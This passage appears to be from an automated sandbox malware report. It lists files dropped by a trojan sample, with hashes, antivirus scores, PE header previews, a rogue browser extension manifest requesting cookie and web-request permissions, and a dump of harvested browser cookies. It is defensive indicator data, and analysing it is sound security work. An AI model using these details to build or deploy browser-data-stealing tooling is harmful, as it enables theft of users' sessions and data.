Joe Sandbox View:	Filename: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: tyxCV1ouryr7.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: 6MhmlD8KZh.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: tyxCV1ouryr7.exe, Detection: malicious, Browse Filename: aOn5CfTiwS.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_user.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecv5AA4.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1618258522437.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xdd5cf6c6, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.8744024742416464
Encrypted:	false
SSDEEP:	24576:ox+wP87f2snFhDKhqnxHaCfVccgeTaNX:qsnVf
MD5:	BE0B9C942283EEE82F13178920A10663
SHA1:	34D7EA2E00432DB2D5D4E0387E8109AD16623AB4
SHA-256:	8EE93C0122BC606E58D6FAA66D333B6757E167A8FF3F90E233F45FFBA2F93B4A
SHA-512:	7334DAD071AF5405AA89721DC2E81C4DFF610010786B947A974B8711934B665AE9A147C6C095EAA1660023E0BB739BC23F28E1E39B8B23ABBB80A7FE3E6B6986
Malicious:	false
Preview:	.\..... .......Z........Ef..4...w.............................."....x{......x..h..............................W.4...w..............................................................................................[............B.................................................................................................................. ............y......................................................................................................................................................................................................................................'4\|......y.{.........................y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gdiview.msi Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	;1033
Category:	modified
Size (bytes):	237056
Entropy (8bit):	6.262405449836627
Encrypted:	false
SSDEEP:	3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:	7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:	699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:	DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:	92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:	false
Preview:	......................>.......................................................\|.......\|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Web Data1618258532140 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\crx.7z Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	36105
Entropy (8bit):	7.994610469125073
Encrypted:	true
SSDEEP:	768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:	DAFDD7237BA10D0C91295CD1C15749B2
SHA1:	45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:	B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:	50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:	false
Preview:	7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..\|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^\|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...\|....3...X.E.N.I7...]".50.6...or

C:\Users\user\AppData\Local\crx.json Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1981
Entropy (8bit):	5.365969892012237
Encrypted:	false
SSDEEP:	48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
MD5:	B5CEED4A6FA3F501787DE10B4CB02EEE
SHA1:	F09C0A8CA18D825D6CE6F192090EBD0659C7321B
SHA-256:	749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
SHA-512:	02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
Malicious:	false
Preview:	{"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false

C:\Users\user\AppData\Localwebdata1618258532187 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1618258522437.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1618258522437.txt Download File
Process:	C:\Users\user\AppData\Roaming\1618258522437.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	24468
Entropy (8bit):	3.7162138835602447
Encrypted:	false
SSDEEP:	192:b3r3Ii3M35gYs3b370v323b3n3jLI67T3q5wW/j+es8JlkSt:bb/cJgYsLL0vmL3zLIUqmB8JlkSt
MD5:	A0AB23913CC0846807040DBEB0FE755C
SHA1:	685F7D38EC46F42BD83A443D24E2509298F736CA
SHA-256:	C34058A1646F12D5D4B2C2DE24ADDC1BCC5BE094BB9F28C26566777ED1139BE4
SHA-512:	39E45E98E0B819D368E0F0D7B1065FD3A7142F4F3C6F76702DDF313F6AB5ABC538B9F39957C005F4172A1B96BD65B34DF687B5BA738A755D2FEB168548234D63
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.1. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".m.a.r.k.e.t.P.r.e.f.".,.....".V.a.l.u.e.".:.".d.e.-.c.h.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".Y.e.s.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".2.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.0.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.0. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".P.r.e.f.e.r.e.n.c.e.s.M.s.n.".,.....".V.a.l.u.e.".:.".e.y.J.F.e.H.B.p.c.n.l.U.a.W.1.l.I.j.o.2.M.z.c.y.O.D.g.1.O.T.M.z.N.j.g.z.N.j.I.z.M.D.U.s.I.l.Z.l.c.n.N.p.b.2.4.i.O.j.F.9.0.".,...

Static File Info

General
